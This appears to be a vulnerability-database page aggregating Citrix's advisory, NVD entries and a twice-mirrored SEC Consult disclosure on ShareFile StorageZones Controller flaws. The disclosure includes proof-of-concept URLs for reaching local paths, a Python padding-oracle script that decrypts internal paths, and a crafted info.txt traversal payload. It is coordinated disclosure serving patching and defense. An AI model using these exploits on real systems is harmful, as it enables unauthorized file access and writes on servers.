DATABASE RESOURCES PRICING ABOUT US

{"id": "CTX238022", "type": "citrix", "bulletinFamily": "software", "title": "Citrix ShareFile StorageZones Controller Multiple Security Updates", "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<h2> Description of Problem</h2>\n<div>\n<div>\n<div>\n<p>Two security issues have been identified within Citrix ShareFile StorageZones Controller that, if exploited, could allow a compromised or malicious ShareFile user to write arbitrary files as that Active Directory user to the local file system, and also to discover the full local file system paths of shared files to which the ShareFile user has access.</p>\n<p>These issues affect all currently supported versions of Citrix ShareFile StorageZones Controller before version 5.4.2.</p>\n<p>The following issues have been addressed:</p>\n<p>\u2022 CVE-2018-16968 (Medium): Citrix ShareFile StorageZones Controller before 5.4.2 allows Directory Traversal</p>\n<p>\u2022 CVE-2018-16969 (Low): Citrix ShareFile StorageZones Controller before 5.4.2 has Information Exposure Through an Error Message</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Mitigating Factors</h2>\n<div>\n<div>\n<div>\n<p>These issues require a compromised or malicious ShareFile user in order to exploit them. To write files, the Active Directory user account must also have local file system permissions to write files to the chosen location. To read the full path of a shared file, the ShareFile user account must also have existing permission to the shared file.</p>\n<p> </p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> What Customers Should Do</h2>\n<div>\n<div>\n<div>\n<p>A new version of the Citrix ShareFile StorageZones Controller has been released. Citrix recommends that affected customers review the risks that these issues pose to their specific deployment and upgrade in a timely manner.</p>\n<p>Citrix also recommends that the StorageZones Controller be configured such that Active Directory user accounts only have permissions to read and write files within the storage path root.</p>\n<p>The StorageZones controller can be downloaded at the following location: <a href=\"https://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-542.html\">https://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-542.html</a></p>\n<p> </p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Acknowledgements</h2>\n<div>\n<div>\n<div>\n<p>Citrix thanks Wolfgang Ettlinger of SEC Consult Vulnerability Lab (<a href=\"http://www.sec-consult.com/\">http://www.sec-consult.com/</a>) for working with us to protect Citrix customers.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> What Citrix Is Doing</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix is notifying customers and channel partners about this potential security issue. This article is also available from the Citrix Knowledge Center at <u> <a href=\"http://support.citrix.com/\">http://support.citrix.com/</a></u>.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Obtaining Support on This Issue</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Reporting Security Vulnerabilities</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Changelog</h2>\n<div>\n<div>\n<div>\n<table width=\"100%\">\n<tbody>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">Date </td>\n<td colspan=\"1\" rowspan=\"1\">Change</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">19th September 2018</td>\n<td colspan=\"1\" rowspan=\"1\">Initial publishing</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\n</div></div>\n</section>", "published": "2020-11-09T09:09:01", "modified": "2018-09-19T04:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "href": "https://support.citrix.com/article/CTX238022", "reporter": "Citrix", "references": [], "cvelist": ["CVE-2018-16968", "CVE-2018-16969"], "lastseen": "2021-01-19T22:28:14", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-16968", "CVE-2018-16969"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149570"]}, {"type": "zdt", "idList": ["1337DAY-ID-31198"]}], "rev": 4}, "score": {"value": -0.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-16968", "CVE-2018-16969"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149570"]}, {"type": "zdt", "idList": ["1337DAY-ID-31198"]}]}, "exploitation": null, "vulnersScore": -0.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "edition": 2, "scheme": null, "_state": {"dependencies": 1645901830, "score": 1659842276}, "_internal": {"score_hash": "61b3b0101fbce318ec5bbd7b898a3352"}}

{"zdt": [{"lastseen": "2018-10-02T14:25:37", "description": "Citrix StorageZones Controller versions prior to 5.4.2 suffer from padding oracle, improper access restriction, and path traversal vulnerabilities.", "cvss3": {}, "published": "2018-09-27T00:00:00", "type": "zdt", "title": "Citrix StorageZones Controller Improper Access Restrictions / Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-16969", "CVE-2018-16968"], "modified": "2018-09-27T00:00:00", "id": "1337DAY-ID-31198", "href": "https://0day.today/exploit/description/31198", "sourceData": "=======================================================================\r\n title: Multiple Vulnerabilities\r\n product: Citrix StorageZones Controller\r\n vulnerable version: all versions before 5.4.2\r\n fixed version: 5.4.2\r\n CVE number: CVE-2018-16968, CVE-2018-16969\r\n impact: Medium\r\n homepage: https://www.citrix.com/\r\n found: 2018-08\r\n by: W. Ettlinger (Office Vienna)\r\n SEC Consult Vulnerability Lab\r\n\r\n An integrated part of SEC Consult\r\n Europe | Asia | North America\r\n\r\n https://www.sec-consult.com\r\n\r\n=======================================================================\r\n\r\nVendor description:\r\n-------------------\r\n\"ShareFile is a file sharing service that enables users to easily and securely\r\nexchange documents. ShareFile Enterprise provides enterprise-class service and\r\nincludes StorageZones Controller and the User Management Tool. ShareFile\r\nStorageZones Controller extends the ShareFile software as a service (SaaS)\r\ncloud storage by providing your ShareFile account with private data storage,\r\nreferred to as StorageZones for ShareFile Data. [...].\"\r\n\r\nURL: https://docs.citrix.com/en-us/storagezones-controller/5-0.html\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nUsers of this product are advised to install the security patch provided by Citrix.\r\n\r\nThe vulnerabilities identified suggest that no sufficient technical security\r\naudit has yet been conducted on the Citrix StorageZones Controller. SEC Consult\r\nrecommends Citrix to conduct such an audit.\r\n\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\nThe Citrix StorageZones Controller exposes resources that are typically only\r\navailable to the internal network (e.g. CIFS Windows shares) to clients\r\nconnecting from the Internet.\r\n\r\nIn order to hide internal network paths from the user and in order to only allow\r\naccess to paths specifically allowed by the administrator, internal network\r\npaths are encrypted. E.g. if an administrator wants to allow access to an UNC\r\npath (e.g. \\\\testhost\\testshare\\testdir) this string is encrypted and provided\r\nto the client. When the user calls the API to e.g. list the contents of this\r\ndirectory, the StorageZones Controller returns the encrypted absolute paths for\r\neach directory entry. This way, the absolute internal paths are always hidden\r\nfrom the user.\r\n\r\n1) Improper Access Restrictions\r\nCitrix StorageZone Controller offers users a functionality to convert UNC paths\r\ninto their encrypted form. Therefore, users are able to access any UNC paths\r\naccessible by the StorageZones Controller.\r\n\r\nWhen providing access to a network share, the StorageZones Controller\r\nimpersonates the user. Therefore, unauthorized access to network shares is not\r\npossible.\r\n\r\nHowever, Citrix StorageZones Controller internally does not distinguish between\r\nUNC-paths (e.g. \\\\testhost\\testshare) and local paths (e.g. C:\\Windows).\r\nTherefore, users may access (e.g. read, write, delete) local paths for which\r\nthey have appropriate NTFS permissions.\r\n\r\nNote: Citrix StorageZones allows an administrator to define the paths exposed by\r\nthe StorageZones Controller. By configuring this setting an administrator can\r\nrestrict access to only network paths. The configuration page incorrectly states\r\nthat a value of \"*\" (the default value) \"allows connections to all hosts on the\r\ninternal network\", while in fact it also allows access to local paths.\r\n\r\n2) Padding Oracle\r\nThe encryption mechanism used by the Citrix StorageZones Controller is\r\nvulnerable to a padding oracle attack. This allows an attacker to partly decrypt\r\nor potentially modify internal paths.\r\n\r\n3) Path Traversal\r\nThe upload functionality is vulnerable to a path traversal attack if the\r\npreconditions to exploit the vulnerability #1 are met. In practice this\r\nvulnerability has a similar effect as vulnerability #1.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Improper Access Restrictions\r\nThe following URL demonstrates how local paths can be encrypted:\r\n\r\nhttps://<host>/cifs/v3/Items/ByPath?path=c:\\\r\n\r\nThe following URL demonstrates how e.g. the contents of the directory can be\r\nlisted:\r\n\r\nhttps://<host>/cifs/v3/Items(<encrypted>)?$expand=Children\r\n\r\n\r\n2) Padding Oracle\r\nThe following script demonstrates how encrypted internal paths can partly be\r\ndecrypted. It may also be possible to partly modify encrypted paths (this has\r\nnot been verified).\r\n\r\n---- snip ----\r\nimport sys\r\nsys.path.append('python-paddingoracle')\r\n\r\nfrom paddingoracle import BadPaddingException, PaddingOracle, xor\r\nfrom base64 import b64encode, b64decode\r\nfrom urllib import quote, unquote\r\nimport requests\r\nimport socket\r\nimport time\r\nimport getpass\r\n\r\nURL = 'http://<host>/'\r\nAUTH = (raw_input('User: '),\r\n getpass.getpass('Password: '))\r\n\r\nCIPHER = '<encrypted path>'\r\n\r\nclass PadBuster(PaddingOracle):\r\n def __init__(self, **kwargs):\r\n super(PadBuster, self).__init__(**kwargs)\r\n self.session = requests.Session()\r\n\r\n def oracle(self, data, **kwargs):\r\n d = b64encode('B'*64 + encrypted + data)\\\r\n .replace('=', '_')\\\r\n .replace('+', '-')\\\r\n .replace('/', '!')\r\n\r\n response = self.session.get(URL + 'cifs/v3/Items('+d+')',\r\n headers={'Authorization': 'Basic '+b64encode(':'.join(AUTH))})\r\n\r\n if 'File path could not be resolved.' in response.text:\r\n print 'bad'\r\n raise BadPaddingException\r\n\r\nif __name__ == '__main__':\r\n import logging\r\n logging.basicConfig(level=logging.DEBUG)\r\n\r\n encrypted = bytearray(b64decode(CIPHER\\\r\n .replace('_', '=')\\\r\n .replace('-', '+')\\\r\n .replace('!', '/')))\r\n\r\n padbuster = PadBuster()\r\n\r\n d = b64encode(encrypted)\\\r\n .replace('=', '_')\\\r\n .replace('+', '-')\\\r\n .replace('/', '!')\r\n\r\n print padbuster.decrypt(encrypted, block_size=16, iv=bytearray(16))\r\n---- snip ----\r\n\r\n\r\n3) Path Traversal\r\nThis attack involves uploading a file called \"info.txt\" to any local path (see\r\nvulnerability #1). These info.txt files are used by StorageZones controller\r\nto keep track of ongoing file uploads (e.g. if a file upload is split into\r\nmultiple HTTP requests).\r\n\r\nThe following shows an info.txt file that can be used by an attacker:\r\n\r\ninfo_txt = 'ThreadedUpload|' + \\\r\n 'rsu-00000000000000000000000000000000|' + \\\r\n 'info.txt|0||00000000-0000-0000-00000000000000000|' + \\\r\n '5||False|' + \\\r\n r'..\\dest_dir\\testfile.txt|' + \\ # the temporary upload file\r\n 'False|0|0|0|False|4|apiv3||';\r\n\r\nThis value is then hashed (MD5 encoded as UTF16) and the resulting hash is\r\nappended (info_txt + '|' + hash).\r\n\r\nThis file is normally expected to be in a dedicated temporary directory. When a\r\nrequest is made in reference to an ongoing file upload, a string identifying\r\none specific upload is sent with it. When accessing the info.txt that describes\r\nthe upload, the application uses the upload id sent as a part of the file path\r\n(<tmp upload path>/<upload id>/info.txt).\r\n\r\nAn attacker can therefore conduct a directory traversal attack to reference\r\nthe previously uploaded info.txt. Any uploaded chunk that references this\r\nfile is appended to the temporary upload file (see info_txt above).\r\n\r\nThis file is created with the privileges of the user NETWORK SERVICE. The data\r\nis then written to it with the privileges of the attacker's account.\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe version 5.3.1.5610 of the StorageZones controller was found to be vulnerable.\r\nThis was the latest version as of the time of vulnerability discovery.\r\n\r\nAccording to the vendor, all versions before 5.4.2 are affected by the identified\r\nsecurity issues.\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2018-08-08: Sending encrypted advisory to the Citrix Security Team\r\n2018-08-08: Citrix: Investigation has been started\r\n2018-09-07: Requesting status update\r\n2018-09-07: Citrix: Preliminary release date for the patch: 2018-09-19\r\n2018-09-19: Citrix releases StorageZones Controller version 5.4.2 in which these\r\n vulnerabilities are addressed\r\n2018-09-24: SEC Consult releases the security advisory\r\n\r\n\r\nSolution:\r\n---------\r\nUpgrade to the latest version available:\r\nhttps://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-542.html\r\n\r\nThe Citrix security advisory can be found here:\r\nhttps://support.citrix.com/article/CTX238022\n\n# 0day.today [2018-10-02] #", "sourceHref": "https://0day.today/exploit/31198", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2018-09-27T10:12:49", "description": "", "published": "2018-09-27T00:00:00", "type": "packetstorm", "title": "Citrix StorageZones Controller Improper Access Restrictions / Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-16969", "CVE-2018-16968"], "modified": "2018-09-27T00:00:00", "id": "PACKETSTORM:149570", "href": "https://packetstormsecurity.com/files/149570/Citrix-StorageZones-Controller-Improper-Access-Restrictions-Traversal.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20180924-0 > \n======================================================================= \ntitle: Multiple Vulnerabilities \nproduct: Citrix StorageZones Controller \nvulnerable version: all versions before 5.4.2 \nfixed version: 5.4.2 \nCVE number: CVE-2018-16968, CVE-2018-16969 \nimpact: Medium \nhomepage: https://www.citrix.com/ \nfound: 2018-08 \nby: W. Ettlinger (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"ShareFile is a file sharing service that enables users to easily and securely \nexchange documents. ShareFile Enterprise provides enterprise-class service and \nincludes StorageZones Controller and the User Management Tool. ShareFile \nStorageZones Controller extends the ShareFile software as a service (SaaS) \ncloud storage by providing your ShareFile account with private data storage, \nreferred to as StorageZones for ShareFile Data. [...].\" \n \nURL: https://docs.citrix.com/en-us/storagezones-controller/5-0.html \n \n \nBusiness recommendation: \n------------------------ \nUsers of this product are advised to install the security patch provided by Citrix. \n \nThe vulnerabilities identified suggest that no sufficient technical security \naudit has yet been conducted on the Citrix StorageZones Controller. SEC Consult \nrecommends Citrix to conduct such an audit. \n \n \nVulnerability overview/description: \n----------------------------------- \nThe Citrix StorageZones Controller exposes resources that are typically only \navailable to the internal network (e.g. CIFS Windows shares) to clients \nconnecting from the Internet. \n \nIn order to hide internal network paths from the user and in order to only allow \naccess to paths specifically allowed by the administrator, internal network \npaths are encrypted. E.g. if an administrator wants to allow access to an UNC \npath (e.g. \\\\testhost\\testshare\\testdir) this string is encrypted and provided \nto the client. When the user calls the API to e.g. list the contents of this \ndirectory, the StorageZones Controller returns the encrypted absolute paths for \neach directory entry. This way, the absolute internal paths are always hidden \nfrom the user. \n \n1) Improper Access Restrictions \nCitrix StorageZone Controller offers users a functionality to convert UNC paths \ninto their encrypted form. Therefore, users are able to access any UNC paths \naccessible by the StorageZones Controller. \n \nWhen providing access to a network share, the StorageZones Controller \nimpersonates the user. Therefore, unauthorized access to network shares is not \npossible. \n \nHowever, Citrix StorageZones Controller internally does not distinguish between \nUNC-paths (e.g. \\\\testhost\\testshare) and local paths (e.g. C:\\Windows). \nTherefore, users may access (e.g. read, write, delete) local paths for which \nthey have appropriate NTFS permissions. \n \nNote: Citrix StorageZones allows an administrator to define the paths exposed by \nthe StorageZones Controller. By configuring this setting an administrator can \nrestrict access to only network paths. The configuration page incorrectly states \nthat a value of \"*\" (the default value) \"allows connections to all hosts on the \ninternal network\", while in fact it also allows access to local paths. \n \n2) Padding Oracle \nThe encryption mechanism used by the Citrix StorageZones Controller is \nvulnerable to a padding oracle attack. This allows an attacker to partly decrypt \nor potentially modify internal paths. \n \n3) Path Traversal \nThe upload functionality is vulnerable to a path traversal attack if the \npreconditions to exploit the vulnerability #1 are met. In practice this \nvulnerability has a similar effect as vulnerability #1. \n \n \nProof of concept: \n----------------- \n1) Improper Access Restrictions \nThe following URL demonstrates how local paths can be encrypted: \n \nhttps://<host>/cifs/v3/Items/ByPath?path=c:\\ \n \nThe following URL demonstrates how e.g. the contents of the directory can be \nlisted: \n \nhttps://<host>/cifs/v3/Items(<encrypted>)?$expand=Children \n \n \n2) Padding Oracle \nThe following script demonstrates how encrypted internal paths can partly be \ndecrypted. It may also be possible to partly modify encrypted paths (this has \nnot been verified). \n \n---- snip ---- \nimport sys \nsys.path.append('python-paddingoracle') \n \nfrom paddingoracle import BadPaddingException, PaddingOracle, xor \nfrom base64 import b64encode, b64decode \nfrom urllib import quote, unquote \nimport requests \nimport socket \nimport time \nimport getpass \n \nURL = 'http://<host>/' \nAUTH = (raw_input('User: '), \ngetpass.getpass('Password: ')) \n \nCIPHER = '<encrypted path>' \n \nclass PadBuster(PaddingOracle): \ndef __init__(self, **kwargs): \nsuper(PadBuster, self).__init__(**kwargs) \nself.session = requests.Session() \n \ndef oracle(self, data, **kwargs): \nd = b64encode('B'*64 + encrypted + data)\\ \n.replace('=', '_')\\ \n.replace('+', '-')\\ \n.replace('/', '!') \n \nresponse = self.session.get(URL + 'cifs/v3/Items('+d+')', \nheaders={'Authorization': 'Basic '+b64encode(':'.join(AUTH))}) \n \nif 'File path could not be resolved.' in response.text: \nprint 'bad' \nraise BadPaddingException \n \nif __name__ == '__main__': \nimport logging \nlogging.basicConfig(level=logging.DEBUG) \n \nencrypted = bytearray(b64decode(CIPHER\\ \n.replace('_', '=')\\ \n.replace('-', '+')\\ \n.replace('!', '/'))) \n \npadbuster = PadBuster() \n \nd = b64encode(encrypted)\\ \n.replace('=', '_')\\ \n.replace('+', '-')\\ \n.replace('/', '!') \n \nprint padbuster.decrypt(encrypted, block_size=16, iv=bytearray(16)) \n---- snip ---- \n \n \n3) Path Traversal \nThis attack involves uploading a file called \"info.txt\" to any local path (see \nvulnerability #1). These info.txt files are used by StorageZones controller \nto keep track of ongoing file uploads (e.g. if a file upload is split into \nmultiple HTTP requests). \n \nThe following shows an info.txt file that can be used by an attacker: \n \ninfo_txt = 'ThreadedUpload|' + \\ \n'rsu-00000000000000000000000000000000|' + \\ \n'info.txt|0||00000000-0000-0000-00000000000000000|' + \\ \n'5||False|' + \\ \nr'..\\dest_dir\\testfile.txt|' + \\ # the temporary upload file \n'False|0|0|0|False|4|apiv3||'; \n \nThis value is then hashed (MD5 encoded as UTF16) and the resulting hash is \nappended (info_txt + '|' + hash). \n \nThis file is normally expected to be in a dedicated temporary directory. When a \nrequest is made in reference to an ongoing file upload, a string identifying \none specific upload is sent with it. When accessing the info.txt that describes \nthe upload, the application uses the upload id sent as a part of the file path \n(<tmp upload path>/<upload id>/info.txt). \n \nAn attacker can therefore conduct a directory traversal attack to reference \nthe previously uploaded info.txt. Any uploaded chunk that references this \nfile is appended to the temporary upload file (see info_txt above). \n \nThis file is created with the privileges of the user NETWORK SERVICE. The data \nis then written to it with the privileges of the attacker's account. \n \n \nVulnerable / tested versions: \n----------------------------- \nThe version 5.3.1.5610 of the StorageZones controller was found to be vulnerable. \nThis was the latest version as of the time of vulnerability discovery. \n \nAccording to the vendor, all versions before 5.4.2 are affected by the identified \nsecurity issues. \n \n \nVendor contact timeline: \n------------------------ \n2018-08-08: Sending encrypted advisory to the Citrix Security Team \n2018-08-08: Citrix: Investigation has been started \n2018-09-07: Requesting status update \n2018-09-07: Citrix: Preliminary release date for the patch: 2018-09-19 \n2018-09-19: Citrix releases StorageZones Controller version 5.4.2 in which these \nvulnerabilities are addressed \n2018-09-24: SEC Consult releases the security advisory \n \n \nSolution: \n--------- \nUpgrade to the latest version available: \nhttps://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-542.html \n \nThe Citrix security advisory can be found here: \nhttps://support.citrix.com/article/CTX238022 \n \n \nWorkaround: \n----------- \nNone \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF W. Ettlinger / @2018 \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149570/SA-20180924-0.txt"}], "cve": [{"lastseen": "2022-03-23T14:23:43", "description": "Citrix ShareFile StorageZones Controller before 5.4.2 has Information Exposure Through an Error Message.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-09-26T21:29:00", "type": "cve", "title": "CVE-2018-16969", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-16969"], "modified": "2018-11-23T16:43:00", "cpe": [], "id": "CVE-2018-16969", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16969", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T14:23:41", "description": "Citrix ShareFile StorageZones Controller before 5.4.2 allows Directory Traversal.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 3.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-09-26T21:29:00", "type": "cve", "title": "CVE-2018-16968", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-16968"], "modified": "2018-11-23T16:44:00", "cpe": [], "id": "CVE-2018-16968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16968", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}]}